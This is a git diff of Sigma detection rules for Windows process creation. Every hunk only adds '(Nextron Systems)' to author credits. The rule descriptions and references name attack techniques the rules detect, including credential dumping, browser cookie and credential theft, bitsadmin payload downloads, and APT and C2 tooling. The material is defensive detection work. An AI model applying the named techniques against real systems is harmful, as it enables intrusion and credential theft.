100644 --- a/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml @@ -8,7 +8,7 @@ references: - https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3 - https://twitter.com/GadixCRK/status/1369313704869834753?s=20 - https://twitter.com/BleepinComputer/status/1372218235949617161 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/03/09 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml index bb2986d64..efd1d94e2 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_hurricane_panda.yml @@ -4,7 +4,7 @@ status: test description: Detects Hurricane Panda Activity references: - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/03/04 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml b/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml index 80ca5e8f4..ba565a4ed 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_judgement_panda_gtr19.yml @@ -4,7 +4,7 @@ status: test description: Detects Judgement Panda activity as described in Global Threat Report 2019 by Crowdstrike references: - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/02/21 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml b/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml index cb8a67a3f..7f3098656 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_lazarus_activity_dec20.yml @@ -5,7 +5,7 @@ description: Detects different process creation events as described in various t references: - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ - https://www.hvs-consulting.de/lazarus-report/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/12/23 modified: 2022/12/02 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml b/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml index ad16d802a..1f41f2652 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_lazarus_loader.yml @@ -5,7 +5,7 @@ description: Detects different loaders as described in various threat reports on references: - https://www.hvs-consulting.de/lazarus-report/ - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ -author: Florian Roth, wagga +author: Florian Roth (Nextron Systems), wagga date: 2020/12/23 modified: 2021/06/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml index ff72162c8..d67e6d617 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_mercury.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_mercury.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious command line patterns as seen being used by MERCURY threat actor references: - https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/08/26 modified: 2022/09/12 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml b/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml index f8d0e0367..d02676a5b 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_mustangpanda.yml @@ -6,7 +6,7 @@ references: - https://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/ - https://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/ - https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations -author: Florian Roth, oscd.community +author: Florian Roth (Nextron Systems), oscd.community date: 2019/10/30 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml b/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml index 4ea229901..932945ea6 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_revil_kaseya.yml @@ -8,7 +8,7 @@ references: - https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b - https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/ - https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/03 modified: 2022/05/20 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml b/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml index 08435287b..8ae120d09 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_slingshot.yml @@ -4,7 +4,7 @@ status: test description: Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group references: - https://securelist.com/apt-slingshot/84312/ -author: Florian Roth, Bartlomiej Czyz (@bczyz1) +author: Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1) date: 2019/03/04 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml b/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml index 8cf5c7e32..b4304269e 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_sofacy.yml @@ -6,7 +6,7 @@ references: - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/ - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100 - https://twitter.com/ClearskySec/status/960924755355369472 -author: Florian Roth, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community date: 2018/03/01 modified: 2022/07/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml b/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml index ed2bd8bef..eebbc9a6a 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml @@ -4,7 +4,7 @@ status: test description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report references: - https://www.us-cert.gov/ncas/alerts/TA17-293A -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/10/22 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml b/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml index ae1733d56..ea997d9cc 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml @@ -4,7 +4,7 @@ status: test description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents references: - https://twitter.com/ForensicITGuy/status/1334734244120309760 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/12/08 modified: 2022/03/31 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml b/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml index 1c9cd0832..596a782f5 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml @@ -4,7 +4,7 @@ status: test description: Detects specific process characteristics of Chinese TAIDOOR RAT malware load references: - https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/07/30 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml b/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml index 7fc776ebb..28cd00c19 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_turla_comrat_may20.yml @@ -4,7 +4,7 @@ status: test description: Detects commands used by Turla group as reported by ESET in May 2020 references: - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2020/05/26 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml b/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml index 3f2490a9c..13a364af4 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_unc2452_cmds.yml @@ -4,7 +4,7 @@ status: test description: Detects a specific process creation patterns as seen used by UNC2452 and provided by Microsoft as Microsoft Defender ATP queries references: - https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/22 modified: 2022/12/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml b/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml index bc1458ab7..0f6acc3b6 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_unc2452_ps.yml @@ -6,7 +6,7 @@ references: - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-7---create-a-process-using-wmi-query-and-an-encoded-command -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/01/20 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml b/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml index 78f6d504c..5a3cdc5b8 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_winnti_mal_hk_jan20.yml @@ -4,7 +4,7 @@ status: test description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities references: - https://www.welivesecurity.com/2020/01/31/winnti-group-targeting-universities-hong-kong/ -author: Florian Roth, Markus Neis +author: Florian Roth (Nextron Systems), Markus Neis date: 2020/02/01 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml b/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml index a19577e9c..17cce33e2 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml @@ -4,7 +4,7 @@ status: stable description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET references: - https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/ -author: Florian Roth, oscd.community +author: Florian Roth (Nextron Systems), oscd.community date: 2020/07/30 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml index e58ff94d0..fc1c5b15b 100644 --- a/rules/windows/process_creation/proc_creation_win_apt_wocao.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_wocao.yml @@ -8,7 +8,7 @@ description: Detects activity mentioned in Operation Wocao report references: - https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/ - https://twitter.com/SBousseaden/status/1207671369963646976 -author: Florian Roth, frack113 +author: Florian Roth (Nextron Systems), frack113 date: 2019/12/20 modified: 2022/10/09 tags: diff --git a/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml b/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml index 551a1f487..8006c5fa9 100755 --- a/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml +++ b/rules/windows/process_creation/proc_creation_win_apt_zxshell.yml @@ -4,7 +4,7 @@ status: test description: Detects a ZxShell start by the called and well-known function name references: - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100 -author: Florian Roth, oscd.community, Jonhnathan Ribeiro +author: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro date: 2017/07/20 modified: 2021/11/27 tags: diff --git a/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml b/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml index c4e92e540..549022958 100644 --- a/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml +++ b/rules/windows/process_creation/proc_creation_win_archiver_iso_phishing.yml @@ -5,7 +5,7 @@ description: Detects cases in which an ISO files is opend within an archiver lik references: - https://twitter.com/1ZRR4H/status/1534259727059787783 - https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/07 tags: - attack.initial_access diff --git a/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml b/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml index e8dc55098..030c074e7 100644 --- a/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_attrib_system_susp_paths.yml @@ -8,7 +8,7 @@ description: Detects usage of attrib with "+s" option to set suspicious script o references: - https://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4 - https://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/28 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml index 703c042ca..70dff26fa 100644 --- a/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml +++ b/rules/windows/process_creation/proc_creation_win_bad_opsec_sacrificial_processes.yml @@ -16,7 +16,7 @@ references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32 - https://docs.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool - https://docs.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool#feedback -author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard +author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems) date: 2020/10/23 modified: 2023/01/25 tags: diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml index 9d072b132..964ba1081 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml @@ -8,7 +8,7 @@ references: - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2023/01/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml index ed32e048e..60314d86e 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ext.yml @@ -6,7 +6,7 @@ references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml index b17ac63a8..589ac298d 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml @@ -10,7 +10,7 @@ references: - https://isc.sans.edu/diary/22264 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2022/12/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml index 5d8e61ee1..a49e4b29a 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml @@ -7,7 +7,7 @@ references: - https://isc.sans.edu/diary/22264 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2022/12/13 tags: diff --git a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 48f738718..aae96e7ce 100644 --- a/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/rules/windows/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -7,7 +7,7 @@ references: - https://isc.sans.edu/diary/22264 - https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/ - https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/28 modified: 2022/11/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml b/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml index 67cb203bb..f68fb3760 100644 --- a/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml +++ b/rules/windows/process_creation/proc_creation_win_browser_remote_debugging.yml @@ -7,7 +7,7 @@ references: - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/ - https://github.com/defaultnamehere/cookie_crimes/ - https://github.com/wunderwuzzi23/firefox-cookiemonster -author: pH-T, Nasreddine Bencherchali (update) +author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2022/07/27 modified: 2022/12/23 tags: diff --git a/rules/windows/process_creation/proc_creation_win_c2_sliver.yml b/rules/windows/process_creation/proc_creation_win_c2_sliver.yml index b9eaa9f3e..480ad9055 100644 --- a/rules/windows/process_creation/proc_creation_win_c2_sliver.yml +++ b/rules/windows/process_creation/proc_creation_win_c2_sliver.yml @@ -5,7 +5,7 @@ description: Detects process activity patterns as seen being used by Sliver C2 f references: - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36 - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ -author: Nasreddine Bencherchali, Florian Roth +author: Nasreddine Bencherchali (Nextron Systems), Florian Roth date: 2022/08/25 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml index 600919203..fb903fd5a 100644 --- a/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml +++ b/rules/windows/process_creation/proc_creation_win_certutil_ntlm_coercion.yml @@ -4,7 +4,7 @@ status: experimental description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag references: - https://github.com/LOLBAS-Project/LOLBAS/issues/243 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/01 tags: - attack.defense_evasion diff --git a/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml b/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml index 50d485df5..997e7332b 100644 --- a/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml +++ b/rules/windows/process_creation/proc_creation_win_change_default_file_assoc_susp.yml @@ -7,7 +7,7 @@ status: experimental description: Detects when a program changes the default file association of any extension to an executable references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/28 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml index 002083247..2c4936720 100644 --- a/rules/windows/process_creation/proc_creation_win_chisel_usage.yml +++ b/rules/windows/process_creation/proc_creation_win_chisel_usage.yml @@ -9,7 +9,7 @@ references: - https://github.com/jpillora/chisel/ - https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/ - https://blog.sekoia.io/lucky-mouse-incident-response-to-detection-engineering/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/09/13 modified: 2022/12/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml b/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml index 2e9cc1673..ac9bcdcf7 100644 --- a/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml +++ b/rules/windows/process_creation/proc_creation_win_chromium_headless_debugging.yml @@ -7,7 +7,7 @@ references: - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password - https://embracethered.com/blog/posts/2020/cookie-crimes-on-mirosoft-edge/ - https://embracethered.com/blog/posts/2020/chrome-spy-remote-control/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/23 tags: - attack.credential_access diff --git a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 6a747e5b0..9f3c85b0d 100644 --- a/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml +++ b/rules/windows/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml @@ -7,7 +7,7 @@ status: experimental description: Detects inline windows shell commands redirecting output via the ">" symbol to a suspicious location references: - https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/12 modified: 2023/01/19 tags: diff --git a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml index b63d63aa1..1bff1e7a6 100644 --- a/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml +++ b/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml @@ -5,7 +5,7 @@ description: Detects usage of cmdkey to look for cached credentials references: - https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation - https://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx -author: jmallette, Florian Roth, Nasreddine Bencherchali (update) +author: jmallette, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2019/01/16 modified: 2022/06/11 tags: diff --git a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml index dfa91262e..8a277b9f2 100644 --- a/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml +++ b/rules/windows/process_creation/proc_creation_win_cmstp_com_object_access.yml @@ -7,7 +7,7 @@ references: - https://twitter.com/hFireF0X/status/897640081053364225 - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf - https://github.com/hfiref0x/UACME -author: Nik Seetharaman, Christian Burkard +author: Nik Seetharaman, Christian Burkard (Nextron Systems) date: 2019/07/31 modified: 2022/09/21 tags: diff --git a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml index d0f1b7646..8d3bcc69e 100644 --- a/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_cobaltstrike_process_patterns.yml @@ -5,7 +5,7 @@ description: Detects process patterns found in Cobalt Strike beacon activity (se references: - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/ - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/07/27 modified: 2022/11/07 tags: diff --git a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml index 4f025337a..372e01d12 100644 --- a/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml +++ b/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml @@ -5,7 +5,7 @@ description: Detects the attempt to evade or obfuscate the executed command on t references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/10/26 modified: 2022/09/20 tags: diff --git a/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml b/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml index 0989036a8..ff13c2741 100644 --- a/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml +++ b/rules/windows/process_creation/proc_creation_win_computer_discovery_get_adcomputer.yml @@ -9,7 +9,7 @@ references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/11/10 modified: 2022/11/17 tags: diff --git a/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml b/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml index 19287a4fe..49d97e07c 100644 --- a/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml +++ b/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml @@ -4,7 +4,7 @@ status: experimental description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking references: - https://pentestlab.blog/2020/07/06/indirect-command-execution/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/14 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml b/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml index 947d2dcac..0b3d77e87 100644 --- a/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml +++ b/rules/windows/process_creation/proc_creation_win_copy_browser_data.yml @@ -10,7 +10,7 @@ description: | Web browsers typically store the credentials in an encrypted format within a credential store. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/23 modified: 2023/01/29 tags: diff --git a/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml b/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml index 325bf81f9..7bb95f2bc 100644 --- a/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml +++ b/rules/windows/process_creation/proc_creation_win_copy_dmp_from_share.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the copy command to copy files with the .dmp extensions from a remote share references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/27 modified: 2022/11/18 tags: diff --git a/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml b/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml index 345196a12..ffa23b140 100644 --- a/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml +++ b/rules/windows/process_creation/proc_creation_win_crackmapexec_patterns.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious process patterns found in logs when CrackMapExec is used references: - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/12 